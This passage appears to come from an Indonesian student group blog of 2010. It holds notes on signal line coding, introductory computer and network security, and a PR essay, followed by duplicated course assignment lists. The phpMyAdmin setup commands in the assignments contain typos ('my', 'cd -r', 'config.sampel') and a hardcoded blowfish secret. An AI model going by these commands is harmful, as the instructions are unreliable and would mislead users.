Ø Untuk melihat perbedaan antara kecepatan data dan kecepatan modulasi.
Ø Ukuran minimal elemen sinyal adalah pulsa untuk binary 1, besarnya ½ panjang interval bit.
Ø RZ tidak memberikan perbaikan terhadap teknik NRZ, bandwidth sinyal besar.
Ø Dipakai untuk beberapa transmisi elementer dan peralatan rekam, tetapi bukan pemilihan yang umum.
1 = ada pulsa pada pertama interval.
0 = tidak ada pulsa.
C. Biphase
Ø Biphase ini diharapkan untuk mengatasi kerugian dari teknik pengkodean sinyal NRZ dan RZ.
Ø Sekurang-kurangnya memerlukan satu transisi waktu bit dan sebanyak-banyaknya dua transisi, sehingga kecepatan modulasi maximum 2x NRZ dan bandwidth besar.
Jenis-jenisnya:
1. Biphase – Level, Manchester (Biphase-L).
Konsep Manchester (Biphase L) adalah perubahan transisi di tengah interval untuk signal “0” perubahan terjadi dari positif ke negatif, sedangkan bit “1” perubahan terjadi dari negatif ke positif. Konsep ini digunakan oleh IEEE 802.3.
1 = ada transisi dari tinggi ke rendah ditengah interval.
0 = ada transisi dari rendah ke tinggi ditengah interval.
2. Biphase – Mark ( Biphase-M).
Selalu ada transisi diawal interval.
1 = ada transisi ditengah interval.
0 = tidak ada transisi ditengah interval.
3. Biphase – Space ( Biphase-S).
Tidak ada transisi diawal interval.
1 = tidak ada transisi ditengah interval.
0 = ada transisi ditengah interval.
4. Differential Manchester.
1 = tidak ada transisi diawal interval.
0 = transisi ditengah interval.
D. Delay Modulation (Miller-Coding)
Ø Merupakan alternatif untuk teknik biphase juga miller coding.
Ø Dengan miller coding sekurang-kurangnya ada satu transisi per dua waktu bit.
Ø Sehingga miller coding mempunyai beberapa synchronisasi capability, tetapi memerlukan kecepatan modulasi rendah dan bandwidth lebih kecil dari biphase.
1 = ada transisi ditengah interval.
0 = tidak ada transisi jika diikuti oleh bit 1.
ada transisi diakhir interval jika diikuti bit 0.
E. Multilevel Binary (Bipolar)
Ø Menggunakan lebih dari dua level sinyal.
Ø Mempunyai pusat bandwidth pada ½ kecepatan bandwidth.
Ø Tidak ada synchronisasi capability.
Ø Bipolar memberikan beberapa error deteksi capability, jika “1” harus mempunyai tanda berlawanan.
1 = ada pulsa pada setengah pertama interval bit.
0 = tidak ada pulsa.
Sumber :
Pokok masalah keamanan sistem salah satunya disebabkan karena sistem time sharing dan akses jarak jauh, apalagi dengan meningkatnya perkembangan jaringan komputer. Keamanan sistem komputer adalah untuk menjamin sumber daya sistem tidak digunakan / dimodifikasi, diinterupsi dan diganggu oleh orang yang tidak diotorisasi. Pengamanan termasuk masalah teknis, manajerial, legalitas dan politis.
Tiga macam keamanan sistem, yaitu :
1. Keamanan eksternal / external security
Berkaitan dengan pengamanan fasilitas komputer dari penyusup dan bencana seperti kebakaran / kebanjiran.
2. Keamanan interface pemakai / user interface security
Berkaitan dengan indentifikasi pemakai sebelum pemakai diijinkan mengakses program dan data yang disimpan
3. Keamanan internal / internal security
Berkaitan dengan pengamanan beragam kendali yang dibangun pada perangkat keras dan sistem operasi yang menjamin operasi yang handal dan tak terkorupsi untuk menjaga integritas program dan data.
Dua masalah penting keamanan, yaitu :
1. Kehilangan data / data loss
Yang disebabkan karena :
Ø Bencana, contohnya kebakaran, banjir, gempa bumi, perang, kerusuhan, tikus, dll.
Ø Kesalahan perangkat keras dan perangkat lunak, contohnya ketidak berfungsinya pemroses, disk / tape yang tidak terbaca, kesalahan komunikasi, kesalahan program / bugs.
Ø Kesalahan / kelalaian manusia, contohnya kesalahan pemasukkan data, memasang tape / disk yang salah, kehilangan disk / tape.
2. Penyusup / intruder
Ø Penyusup pasif, yaitu yang membaca data yang tidak terotorisasi
Ø Penyusup aktif, yaitu mengubah data yang tidak terotorisasi.
Contohnya penyadapan oleh orang dalam, usaha hacker dalam mencari uang, spionase militer / bisnis, lirikan pada saat pengetikan password.
Sasaran keamanan adalah menghindari, mencegah dan mengatasi ancaman terhadap sistem.
Contohnya penyadapan oleh orang dalam, usaha hacker dalam mencari uang, spionase militer / bisnis, lirikan pada saat pengetikan password.
Sasaran keamanan adalah menghindari, mencegah dan mengatasi ancaman terhadap sistem.
Tiga aspek kebutuhan keamanan sistem komputer, yaitu :
a. Kerahasiaan / secrecy, diantaranya privasi
Keterjaminan bahwa informasi di sistem komputer hanya dapat diakses oleh pihak-pihak yang terotorisasi dan modifikasi tetap menjaga konsistensi dan keutuhan data di system
b. Integritas / integrity
Keterjaminan bahwa sumber daya sistem komputer hanya dapat dimodifikasi oleh pihak-pihak yang terotorisasi
c. Ketersediaan / availability
Keterjaminan bahwa sumber daya sistem komputer tersedia bagi pihak-pihak yang diotorisasi saat diperlukan
Tipe ancaman terhadap keamanan sistem komputer dapat dimodelkan dengan memandang fungsi sistem komputeer sebagai penyedia informasi.
Berdasarkan fungsi ini, ancaman terhadap sistem komputeer dikategorikan menjadi 4 ancaman, yaitu :
1. Interupsi / interruption
Sumber daya sistem komputer dihancurkan / menjadi tak tersedia / tak berguna. Merupakan ancaman terhadap ketersediaan. Contohnya penghancuran harddisk, pemotongan kabel komunikasi.
2. Intersepsi / interception
Pihak tak diotorisasi dapat mengakses sumber daya. Merupakan ancaman terhadap kerahasiaan. Pihak tak diotorissasi dapat berupa orang / program komputeer. Contohnya penyadapan, mengcopy file tanpa diotorisasi.
3. Modifikasi / modification
Pihak tak diotorisasi tidak hanya mengakses tapi juga merusak sumber daya. Merupakan ancaman terhadap integritas. Contohnya mengubah nilai file, mengubah program, memodifikasi pesan
4. Fabrikasi / fabrication
Pihak tak diotorisasi menyisipkan / memasukkan objek-objek palsu ke sistem. Merupakan ancaman terhadap integritas. Contohnya memasukkan pesan palsu ke jaringan, menambah record file.
Petunjuk prinsip-prinsip pengamanan sistem komputer, yaitu :
a) Rancangan sistem seharusnya public
Tidak tergantung pada kerahasiaan rancangan mekanisme pengamanan. Membuat proteksi yang bagus dengan mengasumsikan penyusup mengetahui cara kerja sistem pengamanan.
b) Dapat diterima
Mekanisme harus mudah diterima, sehingga dapat digunakan secara benar dan mekanisme proteksi tidak mengganggu kerja pemakai dan pemenuhan kebutuhan otorisasi pengaksesan.
c) Pemeriksaan otoritas saat itu
Banyak sistem memeriksa ijin ketika file dibuka dan setelah itu (opersi lainnya) tidak diperiksa.
d) Kewenangan serendah mungkin
Program / pemakai sistem harusnya beroperasi dengan kumpulan wewenang serendah mungkin yang diperlukan untuk menyelesaikan tugasnya.
e) Mekanisme yang ekonomis
Mekanisme proteksi seharusnya sekecil dan sesederhana mungkin dan seragam sehingga mudah untuk verifikasi.
Memperbaiki Citra, Ketika Citra Telah Hancur Karena Kegagalan (Marketing Dan Teknis)
Kepercayaan dan citra yang baik di mata masyarakat merupakan salah satu yang terpenting bagi eksistensi sebuah perusahaan. “ Pada era persaingan sekarang ini, bukan publik yang membutuhkan perusahaan, tetapi perusahaan yang butuh publik “ (Ardianto, 2004: 3). Apabila kepercayaan dan citra perusahaan rusak di mata masyarakat, maka perusahaan tersebut harus bersiap-siap untuk menghadapi krisis. Suatu perusahaan yang mengalami permasalahan sudah dianggap selesai secara hukum, justru akan berdampak negative dan akan terus berkepanjangan, serta tingkat kepercayaan atau citra masyarakat menjadi turun secara tajam.
Sehubungan dengan masalah di atas, orang yang mempunyai peranan penting untuk mengembalikan citra perusahaan yang baik adalah seorang Public Relations (PR) atau Humas. “ Seorang PR tidak hanya harus mempunyai technical skill dan managerial skill dalam keadaan normal, tapi PR juga harus memiliki kemampuan dalam mengantisipasi, menghadapi atau menangani suatu krisis kepercayaan (crisis of trust) dan penurunan citra (lost of image) yang terjadi “ (Ruslan, 2006: 247). Selanjutnya merupakan tantangan berat adalah pemulihan citra positif (recovery of image) masyarakat terhadap kepercayaan perusahaan.
“ Public Relatios (PR) adalah sebagai jembatan antara perusahaan atau organisasi dengan publiknya, terutama tercapainya mutual understanding (saling pengertian) antara perusahaan dengan publiknya “ (Ardianto,2004: 3). Pengertian lain dari PR adalah fungsi manajemen yang membangun dan mempertahankan hubungan baik dan bermanfaat antar organisasi dengan publik yang mempengaruhi kesuksesan atau kegagalan organisasi tersebut. Jadi, PR itu merupakan kedudukan dalam suatu perusahaan atau organisasi sebagai penghubung antar perusahaan atau organisasi dengan publiknya (Cutlip, 2000: 6).
Pentingnya Public Relations
Sebuah survei yang diadakan oleh American Advertising Federation (AFF) tentang 1.800 eksekutif bisnis. Para eksekutif diberi pertanyaan departemen mana yang paling penting bagi keberhasilan perusahaan mereka. Hasil tersebut menunjukkan bahwa PR menduduki tingkat tiga teratas setelah pengembangan produk dan perencanaan strategis, kemudian disusul oleh periklanan, penelitian dan pengembangan (Litbang), dan hukum. Hal ini dapat dilihat dari tabel :
Tabel diatas mengutkan bahwa PR menjadi kegiatan yang sangat penting saat ini. Dalam konsep marketing kuno dikenalkan dengan 4P (product, price, place, dan promotion), tetapi dewasa ini 4P sudah banyak ditinggalkan orang, tetapi saat ini diperkenalkan dengan 6P. Dua yang lain adalah power dan public relatios (Nurudin, 2008:5).
Public Relations dan Penanganan Krisis Kepercayaan Serta Turunnya Citra Perusahaan
Citra merupakan hal yang terpenting dari suatu perusahaan. Citra ini dengan sengaja diciptakan agar memberikan nilai positif. Nilai positif sangat diperlukan bagi sebuah perusahaan untuk mendapatkan kepercayaan dari publik agar eksistesnsi dari perusahaan dapat terus berlanjut. Saat terjadi krisis kepercayaan dan menurunnya citra perusahaan, peran PR sangat dibutuhkan oleh perusahaan. Untuk lebih jelas mengetahui peran PR dalam menangani krisis kepercayaan dan menurunnya citra perusahaan ada beberapa hal yang harus diperhatikan, yaitu :
• Persyaratan Menjadi Public Relations (PR)
Terdapat persyaratan mendasar yang harus dimiliki seseorang yang ingin menjalankan fungsi PR, diantaranya yaitu :
1. Ability to communicate (kemampuan berkomunikasi)
Kemampuan berkomunikasi bagi seorang PR dalam bentuk lisan dan tulisan, yakni seorang PR harus mampu berbicara di depan umum, seperti dapat melakukan presentasi, mampu mewawancarai dalam upaya pengumpulan fakta dan data, dan dapat diwawancarai oleh pers atau wartawan sebagai sumber berita. Dalam komunikasi tulisan harus mampu membuat Press Release, menulis laporan, membuat naskah pidato untuk manajemen, menulis konsep iklan layanan masyarakat, menulis brosur atau selebaran, dan bentuk komunikasi tulisan lainnya.
2. Ability to organize (kemampuan manajerial atau kepemimpinan)
Kemampuan manajerial atau kepemimpinan seorang PR dapat diartikan sebagai kemampuan mengantisipasi masalah dalam dan luar perusahaan, termasuk kemampuan untuk menyusun rencana kegiatan dan melaksanakannya.
3. Ability to get on with people (kemampuan bergaul atau membina relasi)
Kemampuan bergaul atau membina relasi artinya harus mampu berhubungan dengan dan bekerjasama dengan berbagai macam orang, dan mampu menjaga komunikasi yang baik dengan orang-orang yang berbeda atau sama tingkatannya.
4. Personality Integrity (memiliki kepribadian yang utuh atau jujur)
Kepribadian yang utuh atau jujur, artinya seorang PR harus memiliki kredibilitas yang tinggi, yakni dapat diandalkan dan dipercaya oleh orang lain, dan dapat diterima sebagai orang yang memiliki kepribadian utuh atau jujur.
5. Imagination (banyak ide dan kreatif)
Memiliki imajinasi (banyak ide dan kreatif) dalam pengertian seorang PR harus memiliki wawasan yang luas, mengetahui benang merah persoalan serumit apapun.
• Tujuan Universal Public Relatios
Public Relations memiliki tujuan yang universal diantaranya, yaitu :
1. Menciptakan public understanding (pengertian publik). Pengertian belum berarti persetujuan/penerimaan, dan persetujuan belum berarti penerimaan. Di sini public memahami organisasi/perusahaan tersebut dalam masalah produk/jasa, aktivitas-aktivitas, reputasi, perilaku manajemen, dsb.
2. Menciptakan public Confidence (adanya kepercayaan publik terhadap perusahaan).
3. Menciptakan public Support (adanya unsur dukungan dari publik terhadap perusahaan) baik itu dalam bentuk material maupun spiritual.
4. Menciptakan public Coorperation (adanya kerjasama dari publik terhadap perusahaan).
Metode Public Relations dalam Menangani Krisis Kepercayaan dan Menurunnya Citra Perusahaan
Perusahaan yang baik adalah perusahaan yang berhasil mencapai cita-cita dan tujuannya secara maksimal. Begitu pula dengan kerja praktisi PR yang bertugas menangani krisis kepercayaan dan mengembalikan citra positif perusahaan dimana praktisi PR ini bernaung. Untuk kelancaran jalannya proses pencapaian tujuan tersebut dilakukan cara-cara penyelenggaraan kerja yang seefisien mungkin dengan mengingat faktor tujuan, biaya, fasilitas, waktu, dan tenaga. Dengan kata lain bahwa PR memerlukan metode kerja yang menjadi syarat mutlak untuk mencapai tujuan.
Metode pekerjaan PR ditekankan pada penelitian terhadap publik. Dari penelitian disusun rencana kerja, kemudian dilaksanakan, lalu dilakukan evaluasi. Secara sistemastis proses pekerjaan PR dalam menangani krisis dan menurunnya citra perusahaan dapat digambarkan sesuai tahapan tadi, yaitu :
• Penelitian (Research)
Penelitian mempunyai peranan sangat penting sebagai kegiatan pendukung dalam melaksanakan fungsi PR, baik untuk memperoleh data, fakta lapangan mengenai citra perusahaan, persepsi, pandangan, dan opini public secara akurat serta tanggapan khalayak sebagai target sebagai sasaran mengenai kebikajsanaan, pelayanan, program kerja, aktivitas perusahaan.
• Perencanaan (Planning)
Setelah mendapatkan hasil laporan yang berupa data dan fakta dari penelitian, PR kemudian menyusun rencana kerja. Dalam hal ini rencana kerja disusun tidak berdasarkan pada keinginan yang dipaksakan dan irrasional. Perencanaan yang baik bersifat rasional, flexible, dan berkelanjutan.
Tujuan dari perencanaan PR adalah :
1. Mengubah citra.
2. Membentuk citra baru.
3. Memperkenalkan perusahaan.
4. Meningkatkan community relatios.
5. Menentukan partisipasi pemimpin dalam kehidupan masyarakat (public life).
6. Memberitahukan kegiatan penelitian.
Keberhasilan perencanaan tergantung pada keterampilan dan efisiensi praktisi PR. Salah satu faktor yang bisa dijadikan tolak ukur keberhasilan dari perncanaan tersebut adalah pembentukkan opini, sikap, dan citra.
• Pelaksanaan (Action)
Pelaksanaan dilakukan setelah rencana yang matang mendapatkan persetujuan dari semua pihak terkait. Pelaksanaan kerja merupakan kegiatan operasional dalam melakukan apa yang telah direncanakan. Pengembalian kepercayaan dan citra perusahaan dilakukan dengan menggabungkan tenaga kerja, alat-alat, informasi, waktu, tempat, dan uang. Pelaksanaan ini dikatakan sukses apabila tujuan telah tercapai. Dalam hal ini berbagai cara dan teknik digunakan diantaranya yaitu pendekatan terhadap pegawai (internal public) dan pendekatan kepada umum (eksternal public). Untuk mengebalikan kepercayaan publik dan citra perusahaan diutamakan pendekatan kepada umum karena menyangkut pandangan masyarakat secara luas.
• Penilaian (Evaluation)
Penilaian ini tahap dimana pemeriksaan terhadap program dan rencana yang dapat dilakukan. Tahap ini berguna untuk mengetahui permasalahan yang harus diperhatikan lebih lanjut.
Peran Public Relations sangat besar dalam penanganan krisis kepercayaan dan penurunan citra perusahaan. PR ini mempunyai tujuan universal yaitu menciptakan public understanding, public confidence, public support, public coorperation. Selain itu PR mempunyai fungsi mengetahui secara pasti dan mengevaluasi pendapat umum yang berkaitan dengan perusahaannya, menasehati para eksekutif mengenai cara-cara menangani pendapat umum yang timbul, menggunakan komunikasi untuk mempengaruhi pendapat umum.
Dalam peranannya, PR ini mempunyai metode untuk menangani krisis kepercayaan dan menurunnya citra. Metode ini terdiri dari beberapa tahap yaitu penelitian (research), perencanaan (planning), pelaksanaan (action), dan penilaian (evaluation).
Sumber: http://testanirwana.wordpress.com/
posted by Widyanti Anggita Lestari on Wednesday, December 15, 2010 at 10:02pm
Suatu organisasi dapat mempunyai dua atau lebih dari satu situs atau dimana tiap situs mempunyai jaringan sendiri. Bila organisasi besar, maka sangat dimungkinkan situs-situs tersebut mempunyai administrasi jaringan yang dibedakan menurut tujuan tertentu.
Bila situs-situs ini tidak terhubung melalui internet, tiap situs mungkin memiliki kebijakan keamanan sendiri. Bagaimanapun, bila situs-situs tersebut terhubung melalui internet, maka kebijakan keamanan harus mencakup tujuan dari semua situs yang saling terhubung.
Pada umumnya suatu situs adalah bagian dari organisasi yang mempunyai beberapa komputer dan sumber daya yang terhubung ke dalam suatu jaringan. Sumber daya tersebut misalnya :
- Workstation dan Laptop
- Komputer sebagai host atau server
- Interkoneksi: gateway, router, bridge, repeater
- Perangkat lunak aplikasi dan jaringan (NOS)
- Kabel-kabel jaringan
- Informasi di dalam file dan database
Kebijakan keamanan situs harus memperhatikan pula keamanan terhadap sumber daya tersebut. Karena situs terhubung ke jaringan lain, maka kebijakan keamanan harus memperhatikan kebutuhan dari semua jaringan yang saling terhubung. Hal ini penting untuk diperhatikan karena kemungkinan kebijakan keamanan situs dapat melindungi situs tersebut, namun berbahaya bagi sumber daya jaringan yang lain.
Suatu contoh dari hal ini adalah penggunaan alamat IP di belakang firewall, dimana alamat IP tersebut sudah digunakan oleh orang lain. Pada kasus ini, penyusupan dapat dilakukan terhadap jaringan di belakang firewall dengan melakukan IP spoofing. Sebagai catatan, RFC 1244 membahas keamanan keamanan situs secara detail.
Kebijakan Keamanan Jaringan
Kebijakan keamanan menyediakan kerangka-kerangka untuk membuat keputusan yang spesifik, misalnya mekanisme apa yang akan digunakan untuk melindungi jaringan dan bagaimana mengkonfigurasi servis-servis. Kebijakan keamanan juga merupakan dasar untuk mengembangkan petunjuk pemrograman yang aman untuk diikuti user maupun bagi administrator sistem. Karena kebjikan keamanan tersebut mencakup bahasan yang sangat luas, maka pada saat ini hanya akan dibahas inti permasalahan saja dan tidak akan membahas hal-hal yang bersifat spesifik dari segi teknologi.
Sebuah kebijakan keamanan mencakup hal-hal berikut ini:
- Deskripsi secara detail tentang lingkungan teknis dari situs, hukum yang berlaku, otoritas dari kebijakan tersebut dan filosofi dasar untuk digunakan pada saat menginterpretasikan kebijakan tersebut.
- Analisa risiko yang mengidentifikasi aset-aset situs, ancaman yang dihadapi oleh aset-aset tersebut dan biaya yang harus dikeluarkan untuk kerusakan/kehilangan aset-aset tersebut.
- Petunjuk bagi administrator sistem untuk mengelola sistem
- Definisi bagi user tentang hal-hal yang boleh dilakukan
- Petunjuk untuk kompromi terhadap media dan penerapan hukum yang ada, serta memutuskan apakah akan melacak penyusup atau akan mematikan sistem dan kemudian memulihkannya lagi.
Faktor yang berpengaruh terhadap keberhasilan kebijakan keamanan antara lain adalah:
- Komitmen dari pengelola jaringan
- Dukungan teknologi untuk menerapkan kebijakan keamanan tersebut
- Keefektifan penyebaran kebijakan tersebut
- Kesadaran semua user jaringan terhadap keamanan jaringan
Pihak pengelola jaringan komputer mengatur tanggung jawab terhadap keamanan jaringan, menyediakan training untuk personel-personel yang bertugas di bidang keamanan jaringan dan mengalokasikan dana untuk keamanan jaringan. Yang termasuk pilihan-pilihan teknis yang dapat digunakan untuk mendukung keamanan jaringan komputer antara lain:
- Authentikasi terhadap sistem
- Audit sistem untuk akuntabilitas dan rekonstruksi
- Enkripsi terhadap sistem untuk penyimpanan dan pengiriman data penting
- Tool-tool jaringan, misalnya firewall dan proxy
Hal-hal Praktis Pendukung
Di bawah ini adalah hal-hal praktis yang perlu dilakukan untuk mendukung keamanan jaringan komputer, antara lain:
- Memastikan semua account mempunyai password yang sulit untuk ditebak. Akan lebih baik bila menggunakan OTP (One Time Password)
- Menggunakan tool, misalnya MD5 checksums, sebuah teknik kriptografi untuk memastikan integritas perangkat lunak sistem
- Menggunakan teknik pemrograman yang aman pada saat membuat perangkat lunak
- Selalu bersikap waspada terhadap penggunaan dan konfigurasi jaringan komputer
- Memeriksa secara rutin apakah vendor memiliki perbaikan-perbaikan terhadap lubang keamanan yang terbaru dan selalu menjaga sistem selalu mengalami upgrading terhadap keamanan
- Memeriksa secara rutin dokumen-dokumen dan artikel on-line tentang bahaya keamanan dan teknik mengatasiny. Dokumen dan artikel seperti ini dapat ditemukan pada situs-situs milik incident response teams, misalnya CERT (Computer Emergency Response Team – http://www.cert.org dan Computer Security Incident Response Team - http://www.CSIRT.org)
- Mengaudit sistem dan jaringan dan secara rutin memeriksa daftar log. Beberapa situs yang mengalami insiden keamanan melaporkan bahwa audit yang dikumpulkan minim sehingga sulit untuk mendeteksi dan melacak penyusupan
Written by : IGN Mantra, Analis Senior Keamanan Jaringan dan Pemantau Trafik Internet ID-SIRTII, sekaligus Dosen Keamanan Jaringan dan Cybercrim
sumber : http://www.kampungdesain.com/bali_news.php?bali_web_design=81
by Arif RMan on Thursday, December 9, 2010 at 7:30pm
Tugas Kuliah Media Digital Teori :
A. Buat paper 1
- macam2 format gambar digital,
- run length encoding (rle) dan
- contoh penggunaannya.
dikumpulkan minggu depan softcopy aja plus dan presensi.
(tgl 9 Desember 2010)
*update : tugas paper 1 dikumpulkan bareng paper 2 (16Des2010)
B. Buat Paper(ringkasan) yang menjelaskan tentang :
1. Konsep Gambar dalam layar komputer, dan bagaimana menghitung ukuran file gambar
2. Macam2 format file gambar
3. Penjelasan tentang perintah "help imread" di Matlab beserta perintah2 lain yang berkaitan.
4. Penjelasan tentang perintah "help imshow" di Matlab beserta perintah2 lain yang berkaitan.
5. Jenis2 file gambar apa saja yang bisa dibaca menggunakan matlab?
Berikan Contoh Skrip menampilkan berbagai gambar.
(Dikumpulkan 16 Desember 2010 dan Jangan Lupa presensi di bu anjar)
Tugas Kuliah Jaringan Teori (8 Desember 2010)
Buat Skema jaringan sekolah asal (SMA/SMK tempat sekolah dulu berasal)
menggunakan cisco packet tracert...lengkap dengan seting IP jaringan.
Jika mau bisa menggunakan subnetting...
Jika Kurang jelas bisa bertanya pada yg berangkat kuliah.trims
Tugas Media Pendidikan (Photografi)
Fotografi menggunakan kertas (beli sendiri)
Tugas Manajemen Pendidikan (Pramudi Utomo, M.Si)
1. tugas rumah
2. buat paper tentang menajemen pendidikan
3. paper di buat dngan menggunakan bhasa indonesia
4. paper ditulis boleh dr beberapa sumber
5. dijilid (Kesepakatan Kelas G- Warna Biru Muda Saja)
Tugas Sistem Keamanan - Rahmatul Irfan, M.T (November 2010)
1. Instal Linux Server menggunakan VMWare (Terserah distro linux apa)
2. Seting jadi Proxy Server.
3. hasil jadi, File *.VMX diburning di CD/DVD (masing-masing orang 1)
Tugas Sistem keamanan (9 Desember 2010)
1. Bagaimana menciptakan sistem IT yang tangguh2. Bagaimana keamanan sistem IT yang bagus3. Bagaimana memperbaiki citra, ketika citra telah hancur karena kegagalan (marketing dan teknis)
1 Kelompok = 6 Orang => buat Blogkemudian jawaban di upload di blog.alamat blog dikirim ke email pak irfan
(Minggu Depan)/ 16 Desember 2010
MINGGU DEPAN TIDAK BOLEH TELAT, HARUS ONTIME, YANG TELAT TIDAK BOLEH TTD
Tugas Kuliah Praktek Administrasi jaringan (4 Desember 2010) :
1. download phpmyadmin dr phpmyadmin.net ~~>> cari tar.gz
2. ekstrak & kemudian rename mnjdi phpmyadmindi /usr/local/www/apache22/data/
# tar zxf phpmyadmin-3.3.8.1-all-languages.tar.gz# my phpmyadmin-3.3.8.1-all-languages phpmyadmin# cd -r phpmyadmin /usr/local/www/apache22/data/
3. masuk kedirektori hasil ekstrak phpmyadmin# cd phpmyadmin
4. kopi file config.sampel.inc.php mnjdi config.inc.php# cp config.sampel.inc.php config.inc.php
5. edit file config.inc.php dan tambahkan kata acak pada bariscfgl'blowfish_scret']# ee config.inc.php$cfg['blowfish_secret']='sukasukasayakamumauapasajajugabisa';
6.tambahkan alias pada httpd.conf
alias /phpmyadmin /usr/local/www/apache22/data/phpmyadmin
7. restart apache
# /usr/local/etc//rc.d/apache22 restart
akses melalui : http://ip-addres/phpmyadmin
A. Buat paper 1
- macam2 format gambar digital,
- run length encoding (rle) dan
- contoh penggunaannya.
dikumpulkan minggu depan softcopy aja plus dan presensi.
(tgl 9 Desember 2010)
*update : tugas paper 1 dikumpulkan bareng paper 2 (16Des2010)
B. Buat Paper(ringkasan) yang menjelaskan tentang :
1. Konsep Gambar dalam layar komputer, dan bagaimana menghitung ukuran file gambar
2. Macam2 format file gambar
3. Penjelasan tentang perintah "help imread" di Matlab beserta perintah2 lain yang berkaitan.
4. Penjelasan tentang perintah "help imshow" di Matlab beserta perintah2 lain yang berkaitan.
5. Jenis2 file gambar apa saja yang bisa dibaca menggunakan matlab?
Berikan Contoh Skrip menampilkan berbagai gambar.
(Dikumpulkan 16 Desember 2010 dan Jangan Lupa presensi di bu anjar)
Tugas Kuliah Jaringan Teori (8 Desember 2010)
Buat Skema jaringan sekolah asal (SMA/SMK tempat sekolah dulu berasal)
menggunakan cisco packet tracert...lengkap dengan seting IP jaringan.
Jika mau bisa menggunakan subnetting...
Jika Kurang jelas bisa bertanya pada yg berangkat kuliah.trims
Tugas Media Pendidikan (Photografi)
Fotografi menggunakan kertas (beli sendiri)
Tugas Manajemen Pendidikan (Pramudi Utomo, M.Si)
1. tugas rumah
2. buat paper tentang menajemen pendidikan
3. paper di buat dngan menggunakan bhasa indonesia
4. paper ditulis boleh dr beberapa sumber
5. dijilid (Kesepakatan Kelas G- Warna Biru Muda Saja)
Tugas Sistem Keamanan - Rahmatul Irfan, M.T (November 2010)
1. Instal Linux Server menggunakan VMWare (Terserah distro linux apa)
2. Seting jadi Proxy Server.
3. hasil jadi, File *.VMX diburning di CD/DVD (masing-masing orang 1)
Tugas Sistem keamanan (9 Desember 2010)
1. Bagaimana menciptakan sistem IT yang tangguh2. Bagaimana keamanan sistem IT yang bagus3. Bagaimana memperbaiki citra, ketika citra telah hancur karena kegagalan (marketing dan teknis)
1 Kelompok = 6 Orang => buat Blogkemudian jawaban di upload di blog.alamat blog dikirim ke email pak irfan
(Minggu Depan)/ 16 Desember 2010
MINGGU DEPAN TIDAK BOLEH TELAT, HARUS ONTIME, YANG TELAT TIDAK BOLEH TTD
Tugas Kuliah Praktek Administrasi jaringan (4 Desember 2010) :
1. download phpmyadmin dr phpmyadmin.net ~~>> cari tar.gz
2. ekstrak & kemudian rename mnjdi phpmyadmindi /usr/local/www/apache22/data/
# tar zxf phpmyadmin-3.3.8.1-all-languages.tar.gz# my phpmyadmin-3.3.8.1-all-languages phpmyadmin# cd -r phpmyadmin /usr/local/www/apache22/data/
3. masuk kedirektori hasil ekstrak phpmyadmin# cd phpmyadmin
4. kopi file config.sampel.inc.php mnjdi config.inc.php# cp config.sampel.inc.php config.inc.php
5. edit file config.inc.php dan tambahkan kata acak pada bariscfgl'blowfish_scret']# ee config.inc.php$cfg['blowfish_secret']='sukasukasayakamumauapasajajugabisa';
6.tambahkan alias pada httpd.conf
alias /phpmyadmin /usr/local/www/apache22/data/phpmyadmin
7. restart apache
# /usr/local/etc//rc.d/apache22 restart
akses melalui : http://ip-addres/phpmyadmin
Inilah orang-orang cerdas....Otak Kecil Kemampuan Hebat...
Kekayaan yang tidak dimiliki oleh otak lain,masing-masing memiliki kekuatan, masing-masing memiliki kemampuan, masing-masing memiliki sifat, masing-masing memiliki keistimewaan...
Itulah kami :
1. Arif Rokhman
2. Widyanti Anggita L
3. Sri Esti S
4. Christina Yulika
5. Rosiani
6. Annafi Arrosyida
Adalah anak-anak pinter dari Pendidikan Teknik Informatika, Fakultas Teknik, Universitas Negeri Yogyakarta yang ingin sharing ilmu yang dipunyai kepada khalayak ramai....